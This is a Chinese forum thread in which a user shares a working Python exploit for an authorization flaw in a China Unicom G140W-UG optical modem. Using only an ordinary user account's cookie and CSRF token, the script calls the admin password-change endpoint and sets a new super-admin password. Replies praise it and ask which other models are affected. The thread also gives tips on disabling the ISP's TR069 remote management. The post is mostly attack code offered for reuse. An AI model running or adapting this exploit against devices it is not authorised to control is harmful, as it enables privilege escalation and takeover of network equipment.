联通光猫鉴权漏洞

wmymz · 2024 年5 月 9 日 06:24

TLDR: 联通的光猫接口鉴权有漏洞，使用普通账号的cookie可以调用管理员密码修改接口

今天运营商远程把我联通光猫的管理员密码改了，在网上找了很多方法都失效，最后找到一个鉴权漏洞，只需要光猫普通用户的用户名密码即可修改管理员密码，代码如下：

import re

import requests


class CU:
    def __init__(self, ip, user, pwd):
        self.url = f'http://{ip}'
        self.user = user
        self.pwd = pwd
        self.cookies = None

    def __enter__(self):
        self.login(self.pwd)
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.logout()

    def login(self, pwd):
        resp = requests.post(
            f'{self.url}/login.cgi', data={
                'name': self.user,
                'pswd': pwd,
            },
            allow_redirects=False,
        )
        self.cookies = resp.cookies

    def logout(self):
        requests.get(f'{self.url}/?out', cookies=self.cookies)
        self.cookies = None

    def get_csrf_token(self):
        resp = requests.get(
            f'{self.url}/user.cgi', cookies=self.cookies,
            headers={
                'Referer': 'http://192.168.1.1/'
            })
        return re.findall('(?<=csrf_token=)[^\']*', resp.text)[0]

    def change_user_pwd(self, new):
        requests.post(f'{self.url}/user.cgi?set', data={
            'csrf_token': self.get_csrf_token(),
            'upswd': self.pwd,
            'pswdNew': new,
            'pswdConfirm': new,
            'act': '',
            'tr69_flag': '',
        }, cookies=self.cookies)
        self.pwd = new

    def change_adm_pwd(self, new):
        requests.post(f'{self.url}/user.cgi?set_super', data={
            'csrf_token': self.get_csrf_token(),
            'upswd': self.pwd,
            'pswdNewSuper': new,
            'pswdConfirmSuper': new,
            'act': '',
            'tr69_flag': '',
        }, cookies=self.cookies)


if __name__ == '__main__':
    route_ip = '192.168.1.1'
    user = 'user'
    pwd = 'pvam3tub'
    with CU(route_ip, user, pwd) as obj:
        obj.change_adm_pwd('88888888')

PS：如果不想NTR，可以管理员账号登录光猫把上行先例中的TR069给禁用咯，这样运营商就无法远程配置

5分到手

Dswang · 2024 年5 月 9 日 06:25

牛哇

smooth · 2024 年5 月 9 日 06:26

真的狠。

MergeC · 2024 年5 月 9 日 06:26

厉害厉害，都是高手

7777777 · 2024 年5 月 9 日 06:27

牛哇

join · 2024 年5 月 9 日 06:29

有管理员可以干啥

xinnn · 2024 年5 月 9 日 06:29

适用于大部分联通光猫吗，光猫型号是什么呢

wmymz · 2024 年5 月 9 日 06:30

桥接模式，路由器拨号
启用ipv6等

mjjonone · 2024 年5 月 9 日 06:30

佬最近在研究这个呀，最近大象AI很火，这不玩一下

user74 · 2024 年5 月 9 日 06:32

佬能看看我这篇帖子吗，网上什么办法都试了，可能是因为光猫比较新

wmymz · 2024 年5 月 9 日 06:33

太多了，根本用不完
没得用了再说

mjjonone · 2024 年5 月 9 日 06:34

hh

Amelia · 2024 年5 月 9 日 06:34

mark

wmymz · 2024 年5 月 9 日 06:35

不然删一般是前端校验吧，你把接口爬一下，直接请求试试

lekai · 2024 年5 月 9 日 06:35

光猫型号是啥呀。会不会同样型号不同运营商的光猫也可crack

Gemini · 2024 年5 月 9 日 06:36

佬6

wmymz · 2024 年5 月 9 日 06:37

我的是G140W-UG，别的型号不知道，可以试试

likoo · 2024 年5 月 9 日 06:39

联通+移动的双线接入路过~~

Odelia · 2024 年5 月 9 日 06:40

电信的宽带

App · 2024 年5 月 9 日 06:42

每个地区情况不一样吧，像北京联通，有超管密码也没用，根本没有超管的登录页

话题		回复	浏览量
关于校园网我有个plan 网络安全	27	1160	2024 年4 月 30 日
观小粉兔事件有感，给佬友分享下我自己的一些经验网络安全	48	1749	2024 年6 月 22 日
Smart Input插件激活原理【仅支持windows】软件开发	83	2477	2024 年4 月 30 日
服务器被尝试爆破怎么办快问快答	17	662	2024 年5 月 1 日
靶场思路演练之w1r3s-v1.1 网络安全	2	90	2024 年6 月 29 日

联通光猫鉴权漏洞

相关话题